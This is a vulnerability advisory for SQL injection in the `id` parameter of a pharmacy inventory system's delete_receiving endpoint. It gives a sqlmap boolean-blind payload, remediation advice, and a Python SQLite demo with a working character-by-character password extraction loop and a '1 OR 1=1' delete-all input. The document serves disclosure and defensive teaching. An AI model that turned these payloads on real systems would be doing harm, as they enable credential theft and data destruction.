# Vulnerability Summary: SQL Injection in Pharmacy Sales and Inventory System V1.0

## Vulnerability Overview

* **Affected Product**: Pharmacy Sales and Inventory System Project V1.0
* **Vulnerability Type**: SQL Injection (SQLi)
* **Vulnerable File**: `/ajax.php?action=delete_receiving`
* **Vulnerable Parameter**: POST parameter `id`
* **Root Cause**: The value of the `id` parameter is concatenated into the SQL statement without validation or parameter binding. An attacker who controls `id` can therefore change the structure of the query rather than just the value it compares against, and make the database execute statements the application never intended.
* **Exploitation Conditions**: No authentication or authorization is required; any client that can reach `ajax.php` can send the request.

## Impact Scope

* Unauthorized access to the database: a boolean-based blind injection lets an attacker read arbitrary table contents one condition at a time.
* Leakage of sensitive data such as user credentials and sales records.
* Data tampering, including deletion of arbitrary `receiving` records through the injected `DELETE` itself.
* Full system compromise where the database account also has file-system or command-execution privileges.
* Service disruption, posing a severe threat to system security and business continuity.

## Proof of Concept (POC)

**SQLMap Output Log:**

```text
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (4784=4784) THEN 5 ELSE (SELECT 7976 UNION SELECT 3350) END))
```

The "Parameter replace" technique substitutes the whole `id` value with a subquery. When the condition (`4784=4784`) is true, the `CASE` evaluates to the original id and the request behaves normally; when it is false, the `ELSE` branch returns a two-row subquery where a single value is expected, which the database (MySQL, for example) rejects with an error, so the response differs and the truth of the condition can be inferred. Note that this endpoint is destructive: every probe with a true condition deletes a record, so reproduction should be performed against a disposable copy of the database.

## Remediation

1. **Use Prepared Statements and Parameter Binding**: Prepared statements prevent SQL injection by separating the SQL code from the user-supplied data. With a bound parameter (for example, a `?` placeholder in PDO or mysqli), the value of `id` is sent to the database as data and is never parsed as part of the statement, so a subquery in the value is simply a string that matches no row.
2. **Input Validation and Filtering**: Strictly validate user input against the expected format before it reaches the query. For an integer record id, reject anything that is not a plain integer; this would have blocked the payload above outright.
3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has only the permissions the application needs. Avoid using accounts with elevated privileges (such as root or admin) for daily operations, since those privileges are what turn a SQL injection into file access or command execution.
4. **Regular Security Audits**: Conduct regular security audits of code and systems, including a search for every place where request parameters are concatenated into SQL, to identify and remediate such vulnerabilities in a timely manner.
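The following is an added example, not code from the Pharmacy Sales and Inventory System project. It models the `delete_receiving` handler in Python with an in-memory SQLite database so that it runs offline, and shows the vulnerable concatenation beside the validated, parameter-bound version from the remediation section; it then uses the vulnerable handler as a boolean oracle, in the same shape as the sqlmap payload, to recover a password character by character. The table names `receiving` and `users`, the column names, and all rows (including the password `s3cret`) are constructed for this demo and are assumptions about the application. One difference from the MySQL behaviour the sqlmap payload relies on: SQLite does not raise an error for the two-row `ELSE` subquery, so the oracle here distinguishes true from false by whether the `CASE` yields an existing id (one row deleted) or a non-existent one (nothing deleted).

```python
import re
import sqlite3

# Constructed sample data for the demo; not taken from the real application.
ADMIN_PASSWORD = "s3cret"

# The exact payload from the sqlmap log above.
SQLMAP_PAYLOAD = ("(SELECT (CASE WHEN (4784=4784) THEN 5 "
                  "ELSE (SELECT 7976 UNION SELECT 3350) END))")


def fresh_db() -> sqlite3.Connection:
    """Build an in-memory database with assumed table names and sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE receiving (id INTEGER PRIMARY KEY, supplier TEXT);
        INSERT INTO receiving VALUES (1, 'Acme'), (2, 'Globex'), (5, 'Initech');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '{ADMIN_PASSWORD}');
    """)
    return conn


def delete_receiving_vulnerable(conn: sqlite3.Connection, id_param: str) -> int:
    """Model of the bug class: the POST value is pasted into the SQL text.

    Returns the number of deleted rows, which stands in for the success or
    failure response the attacker observes.
    """
    sql = f"DELETE FROM receiving WHERE id = {id_param}"
    return conn.execute(sql).rowcount


def delete_receiving_fixed(conn: sqlite3.Connection, id_param: str) -> int:
    """Hardened version: validate the shape of the input, then bind it.

    The bound value travels as data, so even a syntactically valid subquery
    is never interpreted as SQL.
    """
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be a non-negative integer")
    return conn.execute("DELETE FROM receiving WHERE id = ?", (int(id_param),)).rowcount


def fixed_rejects(id_param: str) -> bool:
    """True when the hardened handler refuses the input before touching the DB."""
    try:
        delete_receiving_fixed(fresh_db(), id_param)
    except ValueError:
        return True
    return False


def oracle(condition: str) -> bool:
    """One boolean-blind probe against the vulnerable handler.

    Same shape as the sqlmap payload: a true condition makes the CASE yield
    an existing id (5) and one row is deleted; a false condition yields an id
    that does not exist and nothing is deleted. The probe is destructive, so
    each one runs against a fresh copy of the database.
    """
    payload = f"(SELECT (CASE WHEN ({condition}) THEN 5 ELSE 0 END))"
    return delete_receiving_vulnerable(fresh_db(), payload) == 1


def extract_admin_password(max_len: int = 32) -> str:
    """Recover the admin password one character at a time through the oracle."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM users "
                    f"WHERE username = 'admin') = '{ch}'")
            if oracle(cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string
    return recovered


if __name__ == "__main__":
    print("vulnerable, sqlmap payload, rows deleted:",
          delete_receiving_vulnerable(fresh_db(), SQLMAP_PAYLOAD))
    print("vulnerable, '1 OR 1=1', rows deleted:",
          delete_receiving_vulnerable(fresh_db(), "1 OR 1=1"))
    print("fixed rejects sqlmap payload:", fixed_rejects(SQLMAP_PAYLOAD))
    print("fixed, legitimate id 5, rows deleted:",
          delete_receiving_fixed(fresh_db(), "5"))
    print("blind extraction recovered:", extract_admin_password())
```

The vulnerable handler deletes record 5 when given the sqlmap payload and every record when given `1 OR 1=1`; the hardened handler rejects both before a query is built and still deletes exactly one row for a legitimate id. The extraction loop is the practical meaning of "boolean-based blind": with one yes/no signal per request, 36 requests per character is enough to read any column the database account can see.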